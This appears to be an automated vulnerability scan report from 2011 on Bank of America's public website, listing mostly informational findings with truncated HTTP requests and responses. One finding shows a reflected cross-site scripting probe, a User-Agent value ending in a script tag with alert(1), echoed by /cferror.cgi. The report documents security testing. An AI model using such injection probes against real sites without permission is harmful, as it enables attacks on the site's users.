HTTP/1.1 500 Internal Server Error Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:17 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Abnormal Connection: close Set-Cookie: BIGipServerngen-www.80 <HTML> <HEAD> <TITLE>An Error Has Occurred</TITLE> </HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF"> <FORM ACTION="/cferror.cgi" METHOD=POST> <SCRIPT LA ...[SNIP]... <INPUT TYPE="hidden" NAME="Browser" VALUE="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8fbc"><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /cferror.cgi |
POST /cferror.cgi HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica Content-Length: 440 Cache-Control: max-age=0 Origin: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CM_RegCustID=20110628:0:O URL=http%3A%2F%2Fwww ...[SNIP]... |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 14:10:07 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13295 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Page ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /findit/error.cgi |
POST /findit/error.cgi HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica Content-Length: 184 Cache-Control: max-age=0 Origin: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O URL=http%3A%2F%2Fwww |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:31 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13458 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/flyout/HM_Arrays |
GET /surveys/flyout/HM_Arrays Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:00 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13458 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /weblinking/flyout/HM |
GET /weblinking/flyout/HM Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 11:52:58 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13458 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /www/global/mvc_objects |
GET /www/global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:34 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Content-Length: 13458 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... <a href="http://www ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/ |
GET /onlinebanking/?context Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... <td align="center"> <a href="http://sec1 title='" + lpUASbuttonTitle + "' onclick="lpdbButtonAction target="chatLPBofA1"> <script language="JavaScript" src="/chat_deployment ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:36 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... <td align="center"> <a href="http://sec1 title='" + lpUASbuttonTitle + "' onclick="lpdbButtonAction target="chatLPBofA1"> <script language="JavaScript" src="/chat_deployment ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/ |
GET /onlinebanking/?context Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:36 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys/bridge Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:35 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_VISITED_URLS Content-Length: 16269 <html lang="en-US"> <head> <script language="JavaScript" type="text/javascript"> <!-- var hParent = null; var ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/survey_select |
GET /surveys/survey_select Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:38 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_SHOWN_IN_LAST_6 Set-Cookie: SURVEY_SHOW_DETAILS=CTS Content-Length: 735 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /index.cfm |
GET /index.cfm?page=corp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:28 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close <tr valign="top"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <h ...[SNIP]... <p class="pf3-text"><a href="http://www ...[SNIP]... <li><a href="http://gmi.ml.com ...[SNIP]... <li><a href="http://gmi.ml.com ...[SNIP]... <li><a href="https://merril ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="http://ba.ml.com ...[SNIP]... <li><a href="http://ml.com/index ...[SNIP]... <li><a href="http://www ...[SNIP]... <br /> <script language="JavaScript" src="http://www.ethnio ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/ |
GET /onlinebanking/?context Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... <td align="center"> <a href="http://sec1 title='" + lpUASbuttonTitle + "' onclick="lpdbButtonAction target="chatLPBofA1"> <script language="JavaScript" src="/chat_deployment ...[SNIP]... <NOSCRIPT> <IFRAME SRC="http://fls ...[SNIP]... </script> <script language="JavaScript" type="text/javascript" src="http://sec1 ...[SNIP]... </script> <script language="javascript" type="text/javascript" src="http://sec1 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking/index.cfm Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:44 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... </script> <script language="JavaScript" type="text/javascript" src="http://sec1 ...[SNIP]... </script> <script language="javascript" type="text/javascript" src="http://sec1 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar/ |
GET /promos/jump/ktc_coinjar/ Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 11:52:44 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Content-Length: 25899 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... <noscript> <iframe src="https://fls ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /vehicle_and_personal |
GET /vehicle_and_personal Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal X-FRAME-OPTIONS: SAMEORIGIN Page-Completion-Status: Normal Connection: close <style type="text/css" media="all"> .stb_newtext { color:#CC0000; } .standard-text1 { col ...[SNIP]... <NOSCRIPT> <IFRAME SRC="http://fls ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /index.cfm |
GET /index.cfm?page=corp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:28 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close <tr valign="top"> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <h ...[SNIP]... <br /> <script language="JavaScript" src="http://www.ethnio ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/ |
GET /onlinebanking/?context Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... </script> <script language="JavaScript" type="text/javascript" src="http://sec1 ...[SNIP]... </script> <script language="javascript" type="text/javascript" src="http://sec1 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:36 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... </script> <script language="JavaScript" type="text/javascript" src="http://sec1 ...[SNIP]... </script> <script language="javascript" type="text/javascript" src="http://sec1 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /adtrack/index.cgi |
GET /adtrack/index.cgi?adlink Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:04 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: TRACKING_CODE=000309 Set-cookie: PROMO=000309029q8900 Location: https://www.bankofamerica Set-Cookie: BIGipServerngen-www.80 |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /coremetrics/cmdatat |
